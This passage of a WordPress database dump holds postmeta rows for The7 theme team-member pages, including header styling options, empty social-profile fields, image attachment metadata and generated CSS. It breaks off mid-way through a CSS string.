(9265,2603,'_dt_fancy_header_bg_repeat','no-repeat'),
(9266,2603,'_dt_fancy_header_bg_position_x','center'),
(9267,2603,'_dt_fancy_header_bg_position_y','center'),
(9268,2603,'_dt_fancy_header_bg_fullscreen','1'),
(9269,2603,'_dt_fancy_header_bg_overlay','0'),
(9270,2603,'_dt_fancy_header_overlay_color','#000'),
(9271,2603,'_dt_fancy_header_bg_overlay_opacity','50'),
(9272,2603,'_dt_fancy_header_scroll_effect','default'),
(9273,2603,'_dt_fancy_header_bg_parallax','0.5'),
(9274,2603,'_dt_fancy_header_responsiveness_heading',''),
(9275,2603,'_dt_fancy_header_responsiveness','enabled'),
(9276,2603,'_dt_fancy_header_responsiveness_switch','778px'),
(9277,2603,'_dt_fancy_header_responsive_height','70'),
(9278,2603,'_dt_fancy_header_responsive_font_size','30'),
(9279,2603,'_dt_fancy_header_responsive_title_line_height','38'),
(9280,2603,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(9281,2603,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(9282,2603,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(9283,2603,'_dt_teammate_options_go_to_single','1'),
(9284,2603,'_dt_teammate_options_position',''),
(9285,2603,'_dt_teammate_options_website',''),
(9286,2603,'_dt_teammate_options_mail',''),
(9287,2603,'_dt_teammate_options_facebook',''),
(9288,2603,'_dt_teammate_options_twitter',''),
(9289,2603,'_dt_teammate_options_dribbble',''),
(9290,2603,'_dt_teammate_options_you-tube',''),
(9291,2603,'_dt_teammate_options_rss',''),
(9292,2603,'_dt_teammate_options_delicious',''),
(9293,2603,'_dt_teammate_options_flickr',''),
(9294,2603,'_dt_teammate_options_lastfm',''),
(9295,2603,'_dt_teammate_options_linkedin',''),
(9296,2603,'_dt_teammate_options_vimeo',''),
(9297,2603,'_dt_teammate_options_tumbler',''),
(9298,2603,'_dt_teammate_options_pinterest',''),
(9299,2603,'_dt_teammate_options_devian',''),
(9300,2603,'_dt_teammate_options_skype',''),
(9301,2603,'_dt_teammate_options_github',''),
(9302,2603,'_dt_teammate_options_instagram',''),
(9303,2603,'_dt_teammate_options_stumbleupon',''),
(9304,2603,'_dt_teammate_options_behance',''),
(9305,2603,'_dt_teammate_options_px-500',''),
(9306,2603,'_dt_teammate_options_tripedvisor',''),
(9307,2603,'_dt_teammate_options_vk',''),
(9308,2603,'_dt_teammate_options_foursquare',''),
(9309,2603,'_dt_teammate_options_xing',''),
(9310,2603,'_dt_teammate_options_weibo',''),
(9311,2603,'_dt_teammate_options_odnoklassniki',''),
(9312,2603,'_dt_teammate_options_research-gate',''),
(9313,2603,'_dt_teammate_options_yelp',''),
(9314,2603,'_dt_teammate_options_blogger',''),
(9315,2603,'_dt_teammate_options_soundcloud',''),
(9316,2603,'_dt_teammate_options_viber',''),
(9317,2603,'_dt_teammate_options_whatsapp',''),
(9318,2603,'_dt_teammate_options_reddit',''),
(9319,2603,'_dt_teammate_options_snapchat',''),
(9320,2603,'_dt_teammate_options_telegram',''),
(9321,2603,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(9322,2605,'_edit_lock','1680156895:1'),
(9323,2606,'_wp_attached_file','2022/10/co3.jpg'),
(9324,2606,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:113;s:6:\"height\";i:165;s:4:\"file\";s:15:\"2022/10/co3.jpg\";s:8:\"filesize\";i:24010;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"co3-113x150.jpg\";s:5:\"width\";i:113;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3619;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9325,2605,'_thumbnail_id','2606'),
(9326,2605,'_edit_last','1'),
(9327,2605,'_dt_sidebar_position','disabled'),
(9328,2605,'_dt_sidebar_widgetarea_id','sidebar_1'),
(9329,2605,'_dt_sidebar_hide_on_mobile','0'),
(9330,2605,'_dt_footer_show','1'),
(9331,2605,'_dt_footer_widgetarea_id','sidebar_2'),
(9332,2605,'_dt_footer_hide_on_mobile','0'),
(9333,2605,'_dt_header_title','fancy'),
(9334,2605,'_dt_header_background','normal'),
(9335,2605,'_dt_header_background_below_slideshow','disabled'),
(9336,2605,'_dt_header_transparent_bg_color_scheme','light'),
(9337,2605,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(9338,2605,'_dt_header_transparent_top_bar_bg_opacity','25'),
(9339,2605,'_dt_header_transparent_bg_color','#000000'),
(9340,2605,'_dt_header_transparent_bg_opacity','50'),
(9341,2605,'_dt_header_disabled_background','normal'),
(9342,2605,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(9343,2605,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(9344,2605,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(9345,2605,'_dt_header_disabled_transparent_bg_color','#000000'),
(9346,2605,'_dt_header_disabled_transparent_bg_opacity','50'),
(9347,2605,'_dt_page_overrides_top_margin',''),
(9348,2605,'_dt_page_overrides_right_margin',''),
(9349,2605,'_dt_page_overrides_bottom_margin',''),
(9350,2605,'_dt_page_overrides_left_margin',''),
(9351,2605,'_dt_mobile_page_padding_top',''),
(9352,2605,'_dt_mobile_page_padding_right',''),
(9353,2605,'_dt_mobile_page_padding_bottom',''),
(9354,2605,'_dt_mobile_page_padding_left',''),
(9355,2605,'_dt_fancy_header_layout_heading',''),
(9356,2605,'_dt_fancy_header_title_aligment','center'),
(9357,2605,'_dt_fancy_header_height','300'),
(9358,2605,'_dt_fancy_header_padding-top','0px'),
(9359,2605,'_dt_fancy_header_padding-bottom','0px'),
(9360,2605,'_dt_fancy_header_breadcrumbs_heading',''),
(9361,2605,'_dt_fancy_header_breadcrumbs','enabled'),
(9362,2605,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(9363,2605,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(9364,2605,'_dt_fancy_header_title_heading',''),
(9365,2605,'_dt_fancy_header_title_mode','generic'),
(9366,2605,'_dt_fancy_header_title','Lucía Díaz Vilariño University of Vigo, Spain (WG IV/7) '),
(9367,2605,'_dt_fancy_header_title_font_size','30'),
(9368,2605,'_dt_fancy_header_title_line_height','36'),
(9369,2605,'_dt_fancy_header_text_transform','none'),
(9370,2605,'_dt_fancy_header_title_color_mode','color'),
(9371,2605,'_dt_fancy_header_title_color','#ffffff'),
(9372,2605,'_dt_fancy_header_subtitle_heading',''),
(9373,2605,'_dt_fancy_header_subtitle',''),
(9374,2605,'_dt_fancy_header_subtitle_font_size','18'),
(9375,2605,'_dt_fancy_header_subtitle_line_height','26'),
(9376,2605,'_dt_fancy_header_subtitle_text_transform','none'),
(9377,2605,'_dt_fancy_header_subtitle_color_mode','color'),
(9378,2605,'_dt_fancy_header_subtitle_color','#ffffff'),
(9379,2605,'_dt_fancy_header_bg_heading',''),
(9380,2605,'_dt_fancy_header_bg_color','#222222'),
(9381,2605,'_dt_fancy_header_bg_image_origin','custom'),
(9382,2605,'_dt_fancy_header_bg_image','a:0:{}'),
(9383,2605,'_dt_fancy_header_bg_repeat','no-repeat'),
(9384,2605,'_dt_fancy_header_bg_position_x','center'),
(9385,2605,'_dt_fancy_header_bg_position_y','center'),
(9386,2605,'_dt_fancy_header_bg_fullscreen','1'),
(9387,2605,'_dt_fancy_header_bg_overlay','0'),
(9388,2605,'_dt_fancy_header_overlay_color','#000'),
(9389,2605,'_dt_fancy_header_bg_overlay_opacity','50'),
(9390,2605,'_dt_fancy_header_scroll_effect','default'),
(9391,2605,'_dt_fancy_header_bg_parallax','0.5'),
(9392,2605,'_dt_fancy_header_responsiveness_heading',''),
(9393,2605,'_dt_fancy_header_responsiveness','enabled'),
(9394,2605,'_dt_fancy_header_responsiveness_switch','778px'),
(9395,2605,'_dt_fancy_header_responsive_height','70'),
(9396,2605,'_dt_fancy_header_responsive_font_size','30'),
(9397,2605,'_dt_fancy_header_responsive_title_line_height','38'),
(9398,2605,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(9399,2605,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(9400,2605,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(9401,2605,'_dt_teammate_options_go_to_single','1'),
(9402,2605,'_dt_teammate_options_position',''),
(9403,2605,'_dt_teammate_options_website',''),
(9404,2605,'_dt_teammate_options_mail',''),
(9405,2605,'_dt_teammate_options_facebook',''),
(9406,2605,'_dt_teammate_options_twitter',''),
(9407,2605,'_dt_teammate_options_dribbble',''),
(9408,2605,'_dt_teammate_options_you-tube',''),
(9409,2605,'_dt_teammate_options_rss',''),
(9410,2605,'_dt_teammate_options_delicious',''),
(9411,2605,'_dt_teammate_options_flickr',''),
(9412,2605,'_dt_teammate_options_lastfm',''),
(9413,2605,'_dt_teammate_options_linkedin',''),
(9414,2605,'_dt_teammate_options_vimeo',''),
(9415,2605,'_dt_teammate_options_tumbler',''),
(9416,2605,'_dt_teammate_options_pinterest',''),
(9417,2605,'_dt_teammate_options_devian',''),
(9418,2605,'_dt_teammate_options_skype',''),
(9419,2605,'_dt_teammate_options_github',''),
(9420,2605,'_dt_teammate_options_instagram',''),
(9421,2605,'_dt_teammate_options_stumbleupon',''),
(9422,2605,'_dt_teammate_options_behance',''),
(9423,2605,'_dt_teammate_options_px-500',''),
(9424,2605,'_dt_teammate_options_tripedvisor',''),
(9425,2605,'_dt_teammate_options_vk',''),
(9426,2605,'_dt_teammate_options_foursquare',''),
(9427,2605,'_dt_teammate_options_xing',''),
(9428,2605,'_dt_teammate_options_weibo',''),
(9429,2605,'_dt_teammate_options_odnoklassniki',''),
(9430,2605,'_dt_teammate_options_research-gate',''),
(9431,2605,'_dt_teammate_options_yelp',''),
(9432,2605,'_dt_teammate_options_blogger',''),
(9433,2605,'_dt_teammate_options_soundcloud',''),
(9434,2605,'_dt_teammate_options_viber',''),
(9435,2605,'_dt_teammate_options_whatsapp',''),
(9436,2605,'_dt_teammate_options_reddit',''),
(9437,2605,'_dt_teammate_options_snapchat',''),
(9438,2605,'_dt_teammate_options_telegram',''),
(9439,2605,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(9440,2607,'_edit_lock','1680156961:1'),
(9441,2608,'_wp_attached_file','2022/10/sec.jpg'),
(9442,2608,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:115;s:6:\"height\";i:147;s:4:\"file\";s:15:\"2022/10/sec.jpg\";s:8:\"filesize\";i:27943;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(9443,2607,'_thumbnail_id','2608'),
(9444,2607,'_edit_last','1'),
(9445,2607,'_dt_sidebar_position','disabled'),
(9446,2607,'_dt_sidebar_widgetarea_id','sidebar_1'),
(9447,2607,'_dt_sidebar_hide_on_mobile','0'),
(9448,2607,'_dt_footer_show','1'),
(9449,2607,'_dt_footer_widgetarea_id','sidebar_2'),
(9450,2607,'_dt_footer_hide_on_mobile','0'),
(9451,2607,'_dt_header_title','fancy'),
(9452,2607,'_dt_header_background','normal'),
(9453,2607,'_dt_header_background_below_slideshow','disabled'),
(9454,2607,'_dt_header_transparent_bg_color_scheme','light'),
(9455,2607,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(9456,2607,'_dt_header_transparent_top_bar_bg_opacity','25'),
(9457,2607,'_dt_header_transparent_bg_color','#000000'),
(9458,2607,'_dt_header_transparent_bg_opacity','50'),
(9459,2607,'_dt_header_disabled_background','normal'),
(9460,2607,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(9461,2607,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(9462,2607,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(9463,2607,'_dt_header_disabled_transparent_bg_color','#000000'),
(9464,2607,'_dt_header_disabled_transparent_bg_opacity','50'),
(9465,2607,'_dt_page_overrides_top_margin',''),
(9466,2607,'_dt_page_overrides_right_margin',''),
(9467,2607,'_dt_page_overrides_bottom_margin',''),
(9468,2607,'_dt_page_overrides_left_margin',''),
(9469,2607,'_dt_mobile_page_padding_top',''),
(9470,2607,'_dt_mobile_page_padding_right',''),
(9471,2607,'_dt_mobile_page_padding_bottom',''),
(9472,2607,'_dt_mobile_page_padding_left',''),
(9473,2607,'_dt_fancy_header_layout_heading',''),
(9474,2607,'_dt_fancy_header_title_aligment','center'),
(9475,2607,'_dt_fancy_header_height','300'),
(9476,2607,'_dt_fancy_header_padding-top','0px'),
(9477,2607,'_dt_fancy_header_padding-bottom','0px'),
(9478,2607,'_dt_fancy_header_breadcrumbs_heading',''),
(9479,2607,'_dt_fancy_header_breadcrumbs','disabled'),
(9480,2607,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(9481,2607,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(9482,2607,'_dt_fancy_header_title_heading',''),
(9483,2607,'_dt_fancy_header_title_mode','generic'),
(9484,2607,'_dt_fancy_header_title','Zhiyong Wang'),
(9485,2607,'_dt_fancy_header_title_font_size','30'),
(9486,2607,'_dt_fancy_header_title_line_height','36'),
(9487,2607,'_dt_fancy_header_text_transform','none'),
(9488,2607,'_dt_fancy_header_title_color_mode','color'),
(9489,2607,'_dt_fancy_header_title_color','#ffffff'),
(9490,2607,'_dt_fancy_header_subtitle_heading',''),
(9491,2607,'_dt_fancy_header_subtitle',''),
(9492,2607,'_dt_fancy_header_subtitle_font_size','18'),
(9493,2607,'_dt_fancy_header_subtitle_line_height','26'),
(9494,2607,'_dt_fancy_header_subtitle_text_transform','none'),
(9495,2607,'_dt_fancy_header_subtitle_color_mode','color'),
(9496,2607,'_dt_fancy_header_subtitle_color','#ffffff'),
(9497,2607,'_dt_fancy_header_bg_heading',''),
(9498,2607,'_dt_fancy_header_bg_color','#222222'),
(9499,2607,'_dt_fancy_header_bg_image_origin','custom'),
(9500,2607,'_dt_fancy_header_bg_image','a:0:{}'),
(9501,2607,'_dt_fancy_header_bg_repeat','no-repeat'),
(9502,2607,'_dt_fancy_header_bg_position_x','center'),
(9503,2607,'_dt_fancy_header_bg_position_y','center'),
(9504,2607,'_dt_fancy_header_bg_fullscreen','1'),
(9505,2607,'_dt_fancy_header_bg_overlay','0'),
(9506,2607,'_dt_fancy_header_overlay_color','#000'),
(9507,2607,'_dt_fancy_header_bg_overlay_opacity','50'),
(9508,2607,'_dt_fancy_header_scroll_effect','default'),
(9509,2607,'_dt_fancy_header_bg_parallax','0.5'),
(9510,2607,'_dt_fancy_header_responsiveness_heading',''),
(9511,2607,'_dt_fancy_header_responsiveness','enabled'),
(9512,2607,'_dt_fancy_header_responsiveness_switch','778px'),
(9513,2607,'_dt_fancy_header_responsive_height','70'),
(9514,2607,'_dt_fancy_header_responsive_font_size','30'),
(9515,2607,'_dt_fancy_header_responsive_title_line_height','38'),
(9516,2607,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(9517,2607,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(9518,2607,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(9519,2607,'_dt_teammate_options_go_to_single','1'),
(9520,2607,'_dt_teammate_options_position',''),
(9521,2607,'_dt_teammate_options_website',''),
(9522,2607,'_dt_teammate_options_mail',''),
(9523,2607,'_dt_teammate_options_facebook',''),
(9524,2607,'_dt_teammate_options_twitter',''),
(9525,2607,'_dt_teammate_options_dribbble',''),
(9526,2607,'_dt_teammate_options_you-tube',''),
(9527,2607,'_dt_teammate_options_rss',''),
(9528,2607,'_dt_teammate_options_delicious',''),
(9529,2607,'_dt_teammate_options_flickr',''),
(9530,2607,'_dt_teammate_options_lastfm',''),
(9531,2607,'_dt_teammate_options_linkedin',''),
(9532,2607,'_dt_teammate_options_vimeo',''),
(9533,2607,'_dt_teammate_options_tumbler',''),
(9534,2607,'_dt_teammate_options_pinterest',''),
(9535,2607,'_dt_teammate_options_devian',''),
(9536,2607,'_dt_teammate_options_skype',''),
(9537,2607,'_dt_teammate_options_github',''),
(9538,2607,'_dt_teammate_options_instagram',''),
(9539,2607,'_dt_teammate_options_stumbleupon',''),
(9540,2607,'_dt_teammate_options_behance',''),
(9541,2607,'_dt_teammate_options_px-500',''),
(9542,2607,'_dt_teammate_options_tripedvisor',''),
(9543,2607,'_dt_teammate_options_vk',''),
(9544,2607,'_dt_teammate_options_foursquare',''),
(9545,2607,'_dt_teammate_options_xing',''),
(9546,2607,'_dt_teammate_options_weibo',''),
(9547,2607,'_dt_teammate_options_odnoklassniki',''),
(9548,2607,'_dt_teammate_options_research-gate',''),
(9549,2607,'_dt_teammate_options_yelp',''),
(9550,2607,'_dt_teammate_options_blogger',''),
(9551,2607,'_dt_teammate_options_soundcloud',''),
(9552,2607,'_dt_teammate_options_viber',''),
(9553,2607,'_dt_teammate_options_whatsapp',''),
(9554,2607,'_dt_teammate_options_reddit',''),
(9555,2607,'_dt_teammate_options_snapchat',''),
(9556,2607,'_dt_teammate_options_telegram',''),
(9557,2607,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(9563,2580,'the7_shortcodes_dynamic_css','a:2:{s:32:\"4c92c0f4cf117d095c6ca127d76aee06\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-4c92c0f4cf117d095c6ca127d76aee06.resize-by-browser-width .dt-css-grid {\n    